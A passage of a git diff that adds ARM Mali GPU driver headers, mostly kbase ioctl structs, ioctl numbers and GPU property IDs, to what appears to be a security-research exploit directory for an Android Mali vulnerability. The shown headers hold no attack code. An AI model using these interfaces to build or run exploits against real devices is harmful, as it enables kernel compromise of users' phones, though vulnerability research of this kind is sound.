_IO(KBASE_IOCTL_TYPE, 4) + +/** + * struct kbase_ioctl_soft_event_update - Update the status of a soft-event + * @event: GPU address of the event which has been updated + * @new_status: The new status to set + * @flags: Flags for future expansion + */ +struct kbase_ioctl_soft_event_update { + __u64 event; + __u32 new_status; + __u32 flags; +}; + +#define KBASE_IOCTL_SOFT_EVENT_UPDATE \ + _IOW(KBASE_IOCTL_TYPE, 28, struct kbase_ioctl_soft_event_update) + +/** + * struct kbase_kinstr_jm_fd_out - Explains the compatibility information for + * the `struct kbase_kinstr_jm_atom_state_change` structure returned from the + * kernel + * + * @size: The size of the `struct kbase_kinstr_jm_atom_state_change` + * @version: Represents a breaking change in the + * `struct kbase_kinstr_jm_atom_state_change` + * @padding: Explicit padding to get the structure up to 64bits. See + * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst + * + * The `struct kbase_kinstr_jm_atom_state_change` may have extra members at the + * end of the structure that older user space might not understand. If the + * `version` is the same, the structure is still compatible with newer kernels. + * The `size` can be used to cast the opaque memory returned from the kernel. + */ +struct kbase_kinstr_jm_fd_out { + __u16 size; + __u8 version; + __u8 padding[5]; +}; + +/** + * struct kbase_kinstr_jm_fd_in - Options when creating the file descriptor + * + * @count: Number of atom states that can be stored in the kernel circular + * buffer. Must be a power of two + * @padding: Explicit padding to get the structure up to 64bits. See + * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst + */ +struct kbase_kinstr_jm_fd_in { + __u16 count; + __u8 padding[6]; +}; + +union kbase_kinstr_jm_fd { + struct kbase_kinstr_jm_fd_in in; + struct kbase_kinstr_jm_fd_out out; +}; + +#define KBASE_IOCTL_KINSTR_JM_FD \ + _IOWR(KBASE_IOCTL_TYPE, 51, union kbase_kinstr_jm_fd) + + +#define KBASE_IOCTL_VERSION_CHECK_RESERVED \ + _IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check) + +#define KBASE_IOCTL_TYPE 0x80 + +/** + * struct kbase_ioctl_set_flags - Set kernel context creation flags + * + * @create_flags: Flags - see base_context_create_flags + */ +struct kbase_ioctl_set_flags { + __u32 create_flags; +}; + +#define KBASE_IOCTL_SET_FLAGS \ + _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags) + +/** + * struct kbase_ioctl_get_gpuprops - Read GPU properties from the kernel + * + * @buffer: Pointer to the buffer to store properties into + * @size: Size of the buffer + * @flags: Flags - must be zero for now + * + * The ioctl will return the number of bytes stored into @buffer or an error + * on failure (e.g. @size is too small). If @size is specified as 0 then no + * data will be written but the return value will be the number of bytes needed + * for all the properties. + * + * @flags may be used in the future to request a different format for the + * buffer. With @flags == 0 the following format is used. + * + * The buffer will be filled with pairs of values, a __u32 key identifying the + * property followed by the value. The size of the value is identified using + * the bottom bits of the key. The value then immediately followed the key and + * is tightly packed (there is no padding). All keys and values are + * little-endian. + * + * 00 = __u8 + * 01 = __u16 + * 10 = __u32 + * 11 = __u64 + */ +struct kbase_ioctl_get_gpuprops { + __u64 buffer; + __u32 size; + __u32 flags; +}; + +#define KBASE_IOCTL_GET_GPUPROPS \ + _IOW(KBASE_IOCTL_TYPE, 3, struct kbase_ioctl_get_gpuprops) + +/** + * union kbase_ioctl_mem_alloc - Allocate memory on the GPU + * @in: Input parameters + * @in.va_pages: The number of pages of virtual address space to reserve + * @in.commit_pages: The number of physical pages to allocate + * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region + * @in.flags: Flags + * @out: Output parameters + * @out.flags: Flags + * @out.gpu_va: The GPU virtual address which is allocated + */ +union kbase_ioctl_mem_alloc { + struct { + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u64 flags; + } in; + struct { + __u64 flags; + __u64 gpu_va; + } out; +}; + +#define KBASE_IOCTL_MEM_ALLOC \ + _IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc) + +/** + * struct kbase_ioctl_mem_query - Query properties of a GPU memory region + * @in: Input parameters + * @in.gpu_addr: A GPU address contained within the region + * @in.query: The type of query + * @out: Output parameters + * @out.value: The result of the query + * + * Use a %KBASE_MEM_QUERY_xxx flag as input for @query. + */ +union kbase_ioctl_mem_query { + struct { + __u64 gpu_addr; + __u64 query; + } in; + struct { + __u64 value; + } out; +}; + +#define KBASE_IOCTL_MEM_QUERY \ + _IOWR(KBASE_IOCTL_TYPE, 6, union kbase_ioctl_mem_query) + +#define KBASE_MEM_QUERY_COMMIT_SIZE ((__u64)1) +#define KBASE_MEM_QUERY_VA_SIZE ((__u64)2) +#define KBASE_MEM_QUERY_FLAGS ((__u64)3) + +/** + * struct kbase_ioctl_mem_free - Free a memory region + * @gpu_addr: Handle to the region to free + */ +struct kbase_ioctl_mem_free { + __u64 gpu_addr; +}; + +#define KBASE_IOCTL_MEM_FREE \ + _IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free) + +/** + * struct kbase_ioctl_hwcnt_reader_setup - Setup HWC dumper/reader + * @buffer_count: requested number of dumping buffers + * @fe_bm: counters selection bitmask (Front end) + * @shader_bm: counters selection bitmask (Shader) + * @tiler_bm: counters selection bitmask (Tiler) + * @mmu_l2_bm: counters selection bitmask (MMU_L2) + * + * A fd is returned from the ioctl if successful, or a negative value on error + */ +struct kbase_ioctl_hwcnt_reader_setup { + __u32 buffer_count; + __u32 fe_bm; + __u32 shader_bm; + __u32 tiler_bm; + __u32 mmu_l2_bm; +}; + +#define KBASE_IOCTL_HWCNT_READER_SETUP \ + _IOW(KBASE_IOCTL_TYPE, 8, struct kbase_ioctl_hwcnt_reader_setup) + +/** + * struct kbase_ioctl_hwcnt_enable - Enable hardware counter collection + * @dump_buffer: GPU address to write counters to + * @fe_bm: counters selection bitmask (Front end) + * @shader_bm: counters selection bitmask (Shader) + * @tiler_bm: counters selection bitmask (Tiler) + * @mmu_l2_bm: counters selection bitmask (MMU_L2) + */ +struct kbase_ioctl_hwcnt_enable { + __u64 dump_buffer; + __u32 fe_bm; + __u32 shader_bm; + __u32 tiler_bm; + __u32 mmu_l2_bm; +}; + +#define KBASE_IOCTL_HWCNT_ENABLE \ + _IOW(KBASE_IOCTL_TYPE, 9, struct kbase_ioctl_hwcnt_enable) + +#define KBASE_IOCTL_HWCNT_DUMP \ + _IO(KBASE_IOCTL_TYPE, 10) + +#define KBASE_IOCTL_HWCNT_CLEAR \ + _IO(KBASE_IOCTL_TYPE, 11) + +/** + * struct kbase_ioctl_hwcnt_values - Values to set dummy the dummy counters to. + * @data: Counter samples for the dummy model. + * @size: Size of the counter sample data. + * @padding: Padding. + */ +struct kbase_ioctl_hwcnt_values { + __u64 data; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_HWCNT_SET \ + _IOW(KBASE_IOCTL_TYPE, 32, struct kbase_ioctl_hwcnt_values) + +/** + * struct kbase_ioctl_disjoint_query - Query the disjoint counter + * @counter: A counter of disjoint events in the kernel + */ +struct kbase_ioctl_disjoint_query { + __u32 counter; +}; + +#define KBASE_IOCTL_DISJOINT_QUERY \ + _IOR(KBASE_IOCTL_TYPE, 12, struct kbase_ioctl_disjoint_query) + +/** + * struct kbase_ioctl_get_ddk_version - Query the kernel version + * @version_buffer: Buffer to receive the kernel version string + * @size: Size of the buffer + * @padding: Padding + * + * The ioctl will return the number of bytes written into version_buffer + * (which includes a NULL byte) or a negative error code + * + * The ioctl request code has to be _IOW because the data in ioctl struct is + * being copied to the kernel, even though the kernel then writes out the + * version info to the buffer specified in the ioctl. + */ +struct kbase_ioctl_get_ddk_version { + __u64 version_buffer; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_GET_DDK_VERSION \ + _IOW(KBASE_IOCTL_TYPE, 13, struct kbase_ioctl_get_ddk_version) + +/** + * struct kbase_ioctl_mem_jit_init_10_2 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 10.2--11.4) + * @va_pages: Number of VA pages to reserve for JIT + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility. + */ +struct kbase_ioctl_mem_jit_init_10_2 { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_10_2 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_10_2) + +/** + * struct kbase_ioctl_mem_jit_init_11_5 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 11.5--11.19) + * @va_pages: Number of VA pages to reserve for JIT + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility. + */ +struct kbase_ioctl_mem_jit_init_11_5 { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_11_5 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_11_5) + +/** + * struct kbase_ioctl_mem_jit_init - Initialize the just-in-time memory + * allocator + * @va_pages: Number of GPU virtual address pages to reserve for just-in-time + * memory allocations + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * @phys_pages: Maximum number of physical pages to allocate just-in-time + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + */ +struct kbase_ioctl_mem_jit_init { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; + __u64 phys_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init) + +/** + * struct kbase_ioctl_mem_sync - Perform cache maintenance on memory + * + * @handle: GPU memory handle (GPU VA) + * @user_addr: The address where it is mapped in user space + * @size: The number of bytes to synchronise + * @type: The direction to synchronise: 0 is sync to memory (clean), + * 1 is sync from memory (invalidate). Use the BASE_SYNCSET_OP_xxx constants. + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_mem_sync { + __u64 handle; + __u64 user_addr; + __u64 size; + __u8 type; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_MEM_SYNC \ + _IOW(KBASE_IOCTL_TYPE, 15, struct kbase_ioctl_mem_sync) + +/** + * union kbase_ioctl_mem_find_cpu_offset - Find the offset of a CPU pointer + * + * @in: Input parameters + * @in.gpu_addr: The GPU address of the memory region + * @in.cpu_addr: The CPU address to locate + * @in.size: A size in bytes to validate is contained within the region + * @out: Output parameters + * @out.offset: The offset from the start of the memory region to @cpu_addr + */ +union kbase_ioctl_mem_find_cpu_offset { + struct { + __u64 gpu_addr; + __u64 cpu_addr; + __u64 size; + } in; + struct { + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_CPU_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 16, union kbase_ioctl_mem_find_cpu_offset) + +/** + * struct kbase_ioctl_get_context_id - Get the kernel context ID + * + * @id: The kernel context ID + */ +struct kbase_ioctl_get_context_id { + __u32 id; +}; + +#define KBASE_IOCTL_GET_CONTEXT_ID \ + _IOR(KBASE_IOCTL_TYPE, 17, struct kbase_ioctl_get_context_id) + +/** + * struct kbase_ioctl_tlstream_acquire - Acquire a tlstream fd + * + * @flags: Flags + * + * The ioctl returns a file descriptor when successful + */ +struct kbase_ioctl_tlstream_acquire { + __u32 flags; +}; + +#define KBASE_IOCTL_TLSTREAM_ACQUIRE \ + _IOW(KBASE_IOCTL_TYPE, 18, struct kbase_ioctl_tlstream_acquire) + +#define KBASE_IOCTL_TLSTREAM_FLUSH \ + _IO(KBASE_IOCTL_TYPE, 19) + +/** + * struct kbase_ioctl_mem_commit - Change the amount of memory backing a region + * + * @gpu_addr: The memory region to modify + * @pages: The number of physical pages that should be present + * + * The ioctl may return on the following error codes or 0 for success: + * -ENOMEM: Out of memory + * -EINVAL: Invalid arguments + */ +struct kbase_ioctl_mem_commit { + __u64 gpu_addr; + __u64 pages; +}; + +#define KBASE_IOCTL_MEM_COMMIT \ + _IOW(KBASE_IOCTL_TYPE, 20, struct kbase_ioctl_mem_commit) + +/** + * union kbase_ioctl_mem_alias - Create an alias of memory regions + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.stride: Bytes between start of each memory region + * @in.nents: The number of regions to pack together into the alias + * @in.aliasing_info: Pointer to an array of struct base_mem_aliasing_info + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_alias { + struct { + __u64 flags; + __u64 stride; + __u64 nents; + __u64 aliasing_info; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + } out; +}; + +#define KBASE_IOCTL_MEM_ALIAS \ + _IOWR(KBASE_IOCTL_TYPE, 21, union kbase_ioctl_mem_alias) + +enum base_mem_import_type { + BASE_MEM_IMPORT_TYPE_INVALID = 0, + /* + * Import type with value 1 is deprecated. + */ + BASE_MEM_IMPORT_TYPE_UMM = 2, + BASE_MEM_IMPORT_TYPE_USER_BUFFER = 3 +}; + +/** + * struct base_mem_import_user_buffer - Handle of an imported user buffer + * + * @ptr: address of imported user buffer + * @length: length of imported user buffer in bytes + * + * This structure is used to represent a handle of an imported user buffer. + */ + +struct base_mem_import_user_buffer { + __u64 ptr; + __u64 length; +}; + +/** + * union kbase_ioctl_mem_import - Import memory for use by the GPU + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.phandle: Handle to the external memory + * @in.type: Type of external memory, see base_mem_import_type + * @in.padding: Amount of extra VA pages to append to the imported buffer + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_import { + struct { + __u64 flags; + __u64 phandle; + __u32 type; + __u32 padding; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + } out; +}; + +#define KBASE_IOCTL_MEM_IMPORT \ + _IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import) + +/** + * struct kbase_ioctl_mem_flags_change - Change the flags for a memory region + * @gpu_va: The GPU region to modify + * @flags: The new flags to set + * @mask: Mask of the flags to modify + */ +struct kbase_ioctl_mem_flags_change { + __u64 gpu_va; + __u64 flags; + __u64 mask; +}; + +#define KBASE_IOCTL_MEM_FLAGS_CHANGE \ + _IOW(KBASE_IOCTL_TYPE, 23, struct kbase_ioctl_mem_flags_change) + +/** + * struct kbase_ioctl_stream_create - Create a synchronisation stream + * @name: A name to identify this stream. Must be NULL-terminated. + * + * Note that this is also called a "timeline", but is named stream to avoid + * confusion with other uses of the word. + * + * Unused bytes in @name (after the first NULL byte) must be also be NULL bytes. + * + * The ioctl returns a file descriptor. + */ +struct kbase_ioctl_stream_create { + char name[32]; +}; + +#define KBASE_IOCTL_STREAM_CREATE \ + _IOW(KBASE_IOCTL_TYPE, 24, struct kbase_ioctl_stream_create) + +/** + * struct kbase_ioctl_fence_validate - Validate a fd refers to a fence + * @fd: The file descriptor to validate + */ +struct kbase_ioctl_fence_validate { + int fd; +}; + +#define KBASE_IOCTL_FENCE_VALIDATE \ + _IOW(KBASE_IOCTL_TYPE, 25, struct kbase_ioctl_fence_validate) + +/** + * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel + * @buffer: Pointer to the information + * @len: Length + * @padding: Padding + * + * The data provided is accessible through a debugfs file + */ +struct kbase_ioctl_mem_profile_add { + __u64 buffer; + __u32 len; + __u32 padding; +}; + +#define KBASE_IOCTL_MEM_PROFILE_ADD \ + _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add) + +/** + * struct kbase_ioctl_sticky_resource_map - Permanently map an external resource + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to map + */ +struct kbase_ioctl_sticky_resource_map { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_MAP \ + _IOW(KBASE_IOCTL_TYPE, 29, struct kbase_ioctl_sticky_resource_map) + +/** + * struct kbase_ioctl_sticky_resource_map - Unmap a resource mapped which was + * previously permanently mapped + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to unmap + */ +struct kbase_ioctl_sticky_resource_unmap { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_UNMAP \ + _IOW(KBASE_IOCTL_TYPE, 30, struct kbase_ioctl_sticky_resource_unmap) + +/** + * union kbase_ioctl_mem_find_gpu_start_and_offset - Find the start address of + * the GPU memory region for + * the given gpu address and + * the offset of that address + * into the region + * @in: Input parameters + * @in.gpu_addr: GPU virtual address + * @in.size: Size in bytes within the region + * @out: Output parameters + * @out.start: Address of the beginning of the memory region enclosing @gpu_addr + * for the length of @offset bytes + * @out.offset: The offset from the start of the memory region to @gpu_addr + */ +union kbase_ioctl_mem_find_gpu_start_and_offset { + struct { + __u64 gpu_addr; + __u64 size; + } in; + struct { + __u64 start; + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 31, union kbase_ioctl_mem_find_gpu_start_and_offset) + +#define KBASE_IOCTL_CINSTR_GWT_START \ + _IO(KBASE_IOCTL_TYPE, 33) + +#define KBASE_IOCTL_CINSTR_GWT_STOP \ + _IO(KBASE_IOCTL_TYPE, 34) + +/** + * union kbase_ioctl_gwt_dump - Used to collect all GPU write fault addresses. + * @in: Input parameters + * @in.addr_buffer: Address of buffer to hold addresses of gpu modified areas. + * @in.size_buffer: Address of buffer to hold size of modified areas (in pages) + * @in.len: Number of addresses the buffers can hold. + * @in.padding: padding + * @out: Output parameters + * @out.no_of_addr_collected: Number of addresses collected into addr_buffer. + * @out.more_data_available: Status indicating if more addresses are available. + * @out.padding: padding + * + * This structure is used when performing a call to dump GPU write fault + * addresses. + */ +union kbase_ioctl_cinstr_gwt_dump { + struct { + __u64 addr_buffer; + __u64 size_buffer; + __u32 len; + __u32 padding; + + } in; + struct { + __u32 no_of_addr_collected; + __u8 more_data_available; + __u8 padding[27]; + } out; +}; + +#define KBASE_IOCTL_CINSTR_GWT_DUMP \ + _IOWR(KBASE_IOCTL_TYPE, 35, union kbase_ioctl_cinstr_gwt_dump) + +/** + * struct kbase_ioctl_mem_exec_init - Initialise the EXEC_VA memory zone + * + * @va_pages: Number of VA pages to reserve for EXEC_VA + */ +struct kbase_ioctl_mem_exec_init { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_EXEC_INIT \ + _IOW(KBASE_IOCTL_TYPE, 38, struct kbase_ioctl_mem_exec_init) + +/** + * union kbase_ioctl_get_cpu_gpu_timeinfo - Request zero or more types of + * cpu/gpu time (counter values) + * @in: Input parameters + * @in.request_flags: Bit-flags indicating the requested types. + * @in.paddings: Unused, size alignment matching the out. + * @out: Output parameters + * @out.sec: Integer field of the monotonic time, unit in seconds. + * @out.nsec: Fractional sec of the monotonic time, in nano-seconds. + * @out.padding: Unused, for __u64 alignment + * @out.timestamp: System wide timestamp (counter) value. + * @out.cycle_counter: GPU cycle counter value. + */ +union kbase_ioctl_get_cpu_gpu_timeinfo { + struct { + __u32 request_flags; + __u32 paddings[7]; + } in; + struct { + __u64 sec; + __u32 nsec; + __u32 padding; + __u64 timestamp; + __u64 cycle_counter; + } out; +}; + +#define KBASE_IOCTL_GET_CPU_GPU_TIMEINFO \ + _IOWR(KBASE_IOCTL_TYPE, 50, union kbase_ioctl_get_cpu_gpu_timeinfo) + +/** + * struct kbase_ioctl_context_priority_check - Check the max possible priority + * @priority: Input priority & output priority + */ + +struct kbase_ioctl_context_priority_check { + __u8 priority; +}; + +#define KBASE_IOCTL_CONTEXT_PRIORITY_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 54, struct kbase_ioctl_context_priority_check) + +/** + * struct kbase_ioctl_set_limited_core_count - Set the limited core count. + * + * @max_core_count: Maximum core count + */ +struct kbase_ioctl_set_limited_core_count { + __u8 max_core_count; +}; + +#define KBASE_IOCTL_SET_LIMITED_CORE_COUNT \ + _IOW(KBASE_IOCTL_TYPE, 55, struct kbase_ioctl_set_limited_core_count) + + +/*************** + * Pixel ioctls * + ***************/ + +/** + * struct kbase_ioctl_apc_request - GPU asynchronous power control (APC) request + * + * @dur_usec: Duration for GPU to stay awake. + */ +struct kbase_ioctl_apc_request { + __u32 dur_usec; +}; + +#define KBASE_IOCTL_APC_REQUEST \ + _IOW(KBASE_IOCTL_TYPE, 66, struct kbase_ioctl_apc_request) + +/*************** + * test ioctls * + ***************/ +#if MALI_UNIT_TEST +/* These ioctls are purely for test purposes and are not used in the production + * driver, they therefore may change without notice + */ + +#define KBASE_IOCTL_TEST_TYPE (KBASE_IOCTL_TYPE + 1) + + +/** + * struct kbase_ioctl_tlstream_stats - Read tlstream stats for test purposes + * @bytes_collected: number of bytes read by user + * @bytes_generated: number of bytes generated by tracepoints + */ +struct kbase_ioctl_tlstream_stats { + __u32 bytes_collected; + __u32 bytes_generated; +}; + +#define KBASE_IOCTL_TLSTREAM_STATS \ + _IOR(KBASE_IOCTL_TEST_TYPE, 2, struct kbase_ioctl_tlstream_stats) + +#endif /* MALI_UNIT_TEST */ + +/* Customer extension range */ +#define KBASE_IOCTL_EXTRA_TYPE (KBASE_IOCTL_TYPE + 2) + +/* If the integration needs extra ioctl add them there + * like this: + * + * struct my_ioctl_args { + * .... + * } + * + * #define KBASE_IOCTL_MY_IOCTL \ + * _IOWR(KBASE_IOCTL_EXTRA_TYPE, 0, struct my_ioctl_args) + */ + + +/********************************** + * Definitions for GPU properties * + **********************************/ +#define KBASE_GPUPROP_VALUE_SIZE_U8 (0x0) +#define KBASE_GPUPROP_VALUE_SIZE_U16 (0x1) +#define KBASE_GPUPROP_VALUE_SIZE_U32 (0x2) +#define KBASE_GPUPROP_VALUE_SIZE_U64 (0x3) + +#define KBASE_GPUPROP_PRODUCT_ID 1 +#define KBASE_GPUPROP_VERSION_STATUS 2 +#define KBASE_GPUPROP_MINOR_REVISION 3 +#define KBASE_GPUPROP_MAJOR_REVISION 4 +/* 5 previously used for GPU speed */ +#define KBASE_GPUPROP_GPU_FREQ_KHZ_MAX 6 +/* 7 previously used for minimum GPU speed */ +#define KBASE_GPUPROP_LOG2_PROGRAM_COUNTER_SIZE 8 +#define KBASE_GPUPROP_TEXTURE_FEATURES_0 9 +#define KBASE_GPUPROP_TEXTURE_FEATURES_1 10 +#define KBASE_GPUPROP_TEXTURE_FEATURES_2 11 +#define KBASE_GPUPROP_GPU_AVAILABLE_MEMORY_SIZE 12 + +#define KBASE_GPUPROP_L2_LOG2_LINE_SIZE 13 +#define KBASE_GPUPROP_L2_LOG2_CACHE_SIZE 14 +#define KBASE_GPUPROP_L2_NUM_L2_SLICES 15 + +#define KBASE_GPUPROP_TILER_BIN_SIZE_BYTES 16 +#define KBASE_GPUPROP_TILER_MAX_ACTIVE_LEVELS 17 + +#define KBASE_GPUPROP_MAX_THREADS 18 +#define KBASE_GPUPROP_MAX_WORKGROUP_SIZE 19 +#define KBASE_GPUPROP_MAX_BARRIER_SIZE 20 +#define KBASE_GPUPROP_MAX_REGISTERS 21 +#define KBASE_GPUPROP_MAX_TASK_QUEUE 22 +#define KBASE_GPUPROP_MAX_THREAD_GROUP_SPLIT 23 +#define KBASE_GPUPROP_IMPL_TECH 24 + +#define KBASE_GPUPROP_RAW_SHADER_PRESENT 25 +#define KBASE_GPUPROP_RAW_TILER_PRESENT 26 +#define KBASE_GPUPROP_RAW_L2_PRESENT 27 +#define KBASE_GPUPROP_RAW_STACK_PRESENT 28 +#define KBASE_GPUPROP_RAW_L2_FEATURES 29 +#define KBASE_GPUPROP_RAW_CORE_FEATURES 30 +#define KBASE_GPUPROP_RAW_MEM_FEATURES 31 +#define KBASE_GPUPROP_RAW_MMU_FEATURES 32 +#define KBASE_GPUPROP_RAW_AS_PRESENT 33 +#define KBASE_GPUPROP_RAW_JS_PRESENT 34 +#define KBASE_GPUPROP_RAW_JS_FEATURES_0 35 +#define KBASE_GPUPROP_RAW_JS_FEATURES_1 36 +#define KBASE_GPUPROP_RAW_JS_FEATURES_2 37 +#define KBASE_GPUPROP_RAW_JS_FEATURES_3 38 +#define KBASE_GPUPROP_RAW_JS_FEATURES_4 39 +#define KBASE_GPUPROP_RAW_JS_FEATURES_5 40 +#define KBASE_GPUPROP_RAW_JS_FEATURES_6 41 +#define KBASE_GPUPROP_RAW_JS_FEATURES_7 42 +#define KBASE_GPUPROP_RAW_JS_FEATURES_8 43 +#define KBASE_GPUPROP_RAW_JS_FEATURES_9 44 +#define KBASE_GPUPROP_RAW_JS_FEATURES_10 45 +#define KBASE_GPUPROP_RAW_JS_FEATURES_11 46 +#define KBASE_GPUPROP_RAW_JS_FEATURES_12 47 +#define KBASE_GPUPROP_RAW_JS_FEATURES_13 48 +#define KBASE_GPUPROP_RAW_JS_FEATURES_14 49 +#define KBASE_GPUPROP_RAW_JS_FEATURES_15 50 +#define KBASE_GPUPROP_RAW_TILER_FEATURES 51 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_0 52 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_1 53 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_2 54 +#define KBASE_GPUPROP_RAW_GPU_ID 55 +#define KBASE_GPUPROP_RAW_THREAD_MAX_THREADS 56 +#define KBASE_GPUPROP_RAW_THREAD_MAX_WORKGROUP_SIZE 57 +#define KBASE_GPUPROP_RAW_THREAD_MAX_BARRIER_SIZE 58 +#define KBASE_GPUPROP_RAW_THREAD_FEATURES 59 +#define KBASE_GPUPROP_RAW_COHERENCY_MODE 60 + +#define KBASE_GPUPROP_COHERENCY_NUM_GROUPS 61 +#define KBASE_GPUPROP_COHERENCY_NUM_CORE_GROUPS 62 +#define KBASE_GPUPROP_COHERENCY_COHERENCY 63 +#define KBASE_GPUPROP_COHERENCY_GROUP_0 64 +#define KBASE_GPUPROP_COHERENCY_GROUP_1 65 +#define KBASE_GPUPROP_COHERENCY_GROUP_2 66 +#define KBASE_GPUPROP_COHERENCY_GROUP_3 67 +#define KBASE_GPUPROP_COHERENCY_GROUP_4 68 +#define KBASE_GPUPROP_COHERENCY_GROUP_5 69 +#define KBASE_GPUPROP_COHERENCY_GROUP_6 70 +#define KBASE_GPUPROP_COHERENCY_GROUP_7 71 +#define KBASE_GPUPROP_COHERENCY_GROUP_8 72 +#define KBASE_GPUPROP_COHERENCY_GROUP_9 73 +#define KBASE_GPUPROP_COHERENCY_GROUP_10 74 +#define KBASE_GPUPROP_COHERENCY_GROUP_11 75 +#define KBASE_GPUPROP_COHERENCY_GROUP_12 76 +#define KBASE_GPUPROP_COHERENCY_GROUP_13 77 +#define KBASE_GPUPROP_COHERENCY_GROUP_14 78 +#define KBASE_GPUPROP_COHERENCY_GROUP_15 79 + +#define KBASE_GPUPROP_TEXTURE_FEATURES_3 80 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_3 81 + +#define KBASE_GPUPROP_NUM_EXEC_ENGINES 82 + +#define KBASE_GPUPROP_RAW_THREAD_TLS_ALLOC 83 +#define KBASE_GPUPROP_TLS_ALLOC 84 +#define KBASE_GPUPROP_RAW_GPU_FEATURES 85 + +#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12) + +#endif /* _UAPI_KBASE_JM_IOCTL_H_ */ + diff --git a/SecurityExploits/Android/Mali/GHSL-2023-005/mali_base_jm_kernel.h b/SecurityExploits/Android/Mali/GHSL-2023-005/mali_base_jm_kernel.h new file mode 100644 index 0000000..b1cf438 --- /dev/null +++ b/SecurityExploits/Android/Mali/GHSL-2023-005/mali_base_jm_kernel.h @@ -0,0 +1,1216 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2019-2021 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +#ifndef _UAPI_BASE_JM_KERNEL_H_ +#define _UAPI_BASE_JM_KERNEL_H_ + +#include + +typedef __u32 base_mem_alloc_flags; +/* Memory allocation, access/hint flags. + * + * See base_mem_alloc_flags. + */ + +/* IN */ +/* Read access CPU side + */ +#define BASE_MEM_PROT_CPU_RD ((base_mem_alloc_flags)1 << 0) + +/* Write access CPU side + */ +#define BASE_MEM_PROT_CPU_WR ((base_mem_alloc_flags)1 << 1) + +/* Read access GPU side + */ +#define BASE_MEM_PROT_GPU_RD ((base_mem_alloc_flags)1 << 2) + +/* Write access GPU side + */ +#define BASE_MEM_PROT_GPU_WR ((base_mem_alloc_flags)1 << 3) + +/* Execute allowed on the GPU side + */ +#define BASE_MEM_PROT_GPU_EX ((base_mem_alloc_flags)1 << 4) + +/* Will be permanently mapped in kernel space. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_PERMANENT_KERNEL_MAPPING 